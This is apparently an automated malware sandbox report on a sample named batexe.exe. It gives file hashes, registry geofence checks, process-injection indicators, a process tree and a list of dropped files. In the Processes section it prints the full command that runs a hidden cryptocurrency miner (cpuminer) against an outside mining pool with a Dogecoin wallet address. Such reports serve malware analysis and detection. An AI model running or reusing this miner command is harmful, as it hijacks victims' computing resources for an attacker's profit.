Analysis
-
max time kernel
293s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
14/02/2024, 05:18
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231220-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 228 b2e.exe 4852 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4852 cpuminer-sse2.exe 4852 cpuminer-sse2.exe 4852 cpuminer-sse2.exe 4852 cpuminer-sse2.exe 4852 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2248-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2248 wrote to memory of 228 2248 batexe.exe 85 PID 2248 wrote to memory of 228 2248 batexe.exe 85 PID 2248 wrote to memory of 228 2248 batexe.exe 85 PID 228 wrote to memory of 1956 228 b2e.exe 86 PID 228 wrote to memory of 1956 228 b2e.exe 86 PID 228 wrote to memory of 1956 228 b2e.exe 86 PID 1956 wrote to memory of 4852 1956 cmd.exe 89 PID 1956 wrote to memory of 4852 1956 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\6F54.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6F54.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6F54.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71E4.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4852
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.6MB
MD5dcb0ad8092df1840c2ba83e989557ac6
SHA18d973f8d013adbe4c9a7db91097beb4f9fe80b3e
SHA256fc6703b09f79a8783ae8dcc47363fd9b0ed58e4eb8d4315af44a9a092971b668
SHA5121841cfc5351e50ce68d0d6ef1b7fcdc847af089d461779d5540db585702407667d4a5eb6cd729bef2059e9f7a1f2633ab47a4c9b348ea9045f98bd24de116375
-
Filesize
4.6MB
MD55f8ac534e60acb0174aa7a5279866c6d
SHA1722e73ce6887516e83c3dcb52c251386863ecf5a
SHA256d5e898d54b7cd50b03d58023b6ddc74c47fd35e02ca209892ba5c8c297515b46
SHA5121757c36e772f1527b259b4e94ffd01ea6277c4a3f62e2c7b7c97707f08e4208fb017bd281db7a964a31d0f8a8e09e8e23e69214778b4d0f2d02417982723b2ee
-
Filesize
2.4MB
MD549bc36a2d0a19941a832547efaa9a843
SHA18e409738bfb55d66f43bb86647035b661888651d
SHA25658c4ed2cc4f5f5f47f630c79feb848c763d70663eedcc20c6709736044fb5e52
SHA51296d1a229beb50f4b03c0ddf4016aba4f12af5cfd047338201f20e6b59b630953e8de79bcf779db5aa6ed80220dd98320226de04d8b28ea6f25782dc4f2ffc370
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
644KB
MD512ff658d7819a67b26e3ca56777679cb
SHA115336fb6bc5b579ed5300a441e525d16edd543f9
SHA2568c30ba60094d18dcd4be8fb3bff43810bf3a3c57383c27ac3499b42fe6f31feb
SHA51225029f062b38b05f4fb37cc40a5c447f97ee74664c42737a1961469b54e45b8b1177fd501cb147c211e90c002f458ce2c638406bcb14c0e1d1a164b967b70066
-
Filesize
611KB
MD59e6c0be8fd066943ad59f54cb77a96f3
SHA1346314db6a5785278f50e26812f968886a10f4ae
SHA256048ec6fe0a92b4f7bd26ce6be5b957ec0abcf7bf0e37ff78b6a8ca6440821d67
SHA51291c792cd41eca202d3d0fee8338e1df22f5cbb5635cd93f4f96fc60f1dd83ca6f5f33ddef6914e538a7f67f860060e129a6d00e36649aaa3b52e923e769bac8a
-
Filesize
524KB
MD5570a0e800add237a7df1b48bd5b3c84f
SHA1e5de900ce04d1593d0ff6cdd21bbf2766bfcb5aa
SHA2564305d1dc318049d858981ab54287107749da3e4998ab76866e2a7bb80b802346
SHA5126e5c4d9cad00d326671b3607275a74b788514b85fa426a9e50e0b453da401736b149649109feb4aa5c211a6a94f56baef03a38689dfe36265d1f1ff046ecb10a
-
Filesize
486KB
MD59db773cdbfee7fffeb399e8b812028fa
SHA1d40575009510b8e6df982e0183dd04ea32823443
SHA25668867d4d419e49066643ab85b4d28bf1180016564ab84510ddc26b74460d8b42
SHA5124aeb616b43f53cb862a258654f0ad01531e91994f46cef6a7c5ba08db315d10fa9b76aea6059432b200b391b5b0bb9c883fdca7efdc587a1f9b4fd5f87b0cf8b
-
Filesize
799KB
MD5b83e07a457f0db162cbc6ebbdd176e9c
SHA1cc22b2cc183d6606445453b5b06144a8cb792afd
SHA2561c1d19f8252108c030465aa3db415a9e973c2775746381cc3fd8f1a4537d0420
SHA512cb10c73a4aadf5f360059b094db71371584b15780ab964627393829fa62ec2aa00e446905691cca512150f1756d902f6e958a3e7343269bc9b3e3e9f736c3052
-
Filesize
615KB
MD5742a9577a8f305cc98847e47f58234be
SHA1d1fe7f521093c94a14c8f0676bf5525b84108033
SHA2561c9d19002c527249d18bb7e228a4dd66aa019aaf6c122a76b1d435c20bac2ea8
SHA512c8d19277b3d2650f33ebc24625fef64e18f215138af3151757588d6c7ea750e21c1d5adca8bb98a8d3bc35fec487c6631ed14301d2a40eb5aaf31b2cc1dcb025
-
Filesize
757KB
MD59c9c339ebbe4e30a632a36c69b2b6e7d
SHA1535a6db7b567f28c21c060d17dd94b7fe631ee00
SHA256ac4bc6d3014c08787b1d422e6b7755bb86694fa0ec5283f2deeb21589a82a11d
SHA5128830cb3c8d90ee6bed5cf843641e375ac9fb665462f781ebcf034a6d9b8743fbcecc042fa870effc082222bb785953a5eb44902ec27d3dfea0f179c6b1581508
-
Filesize
487KB
MD5f5045b3fd779d9e05ee4f4ab3514ef95
SHA135d188fda555c162d53100434e4b2d1147c6a7a5
SHA2568a56da2d3fbaf5621937b090d184910d03a4e58d0c124f4e88c81c2a0432d7ab
SHA512ffb29d6491c839d65f14b0384f668218b8c1c7eead8214e71f45fcfdd990409d0e50254265d5cc407ff49af85ffd167a008e16f4aba2631989e49db00ae144f0
-
Filesize
213KB
MD5d53b678bc2b29c61f2e93c6046698da5
SHA1dfb47851b3d135dba2981c35462bb23f100d00a7
SHA256c6f935188ddbce1d08502363042e28b874e5fe74990679f9bad9be002e8ac973
SHA512c048b07bad952c12be95b7c7c972fbdb9e72b67e70f1390b0f403af033a6437693284f63a4b7355801e8dfff39335c7365feeaa964b8eb8099fde4f378c2ebaa
-
Filesize
305KB
MD5339a6419fdd33e7d0b20411fa6c8ffa4
SHA14dc334ca0a89a55af8f05429c56d2ca488c739e9
SHA2564b83a7914805a1005cef0e353e994a76af90c5f3993d04784f2f588db57ef2c5
SHA512bb53098d6cfb2455d4c2792b70c418d6ff46ba632a267569a7ac718d229cd400d7910ece3fee87c76877fd82deae0a7d48c7b59a1bb2f6f2faaf30b53e5d1aea
-
Filesize
248KB
MD55e7ce4bf966a7c2122821d7ff9a19a7f
SHA15bf94b4aa0ab12f40469187aff24f81f4924d0c4
SHA25697146721f6526c6bb0a8a9989197886b266faae2a4e62ff8f70a77a13c27bc5e
SHA5123a1aeac6632417c8ba4a1cb53f9df475abc3dda01838f2cecee60829366c5f332db144a2844f4291f7bd494c87076df5dde962d6186cc069ae2fdabfc97a752b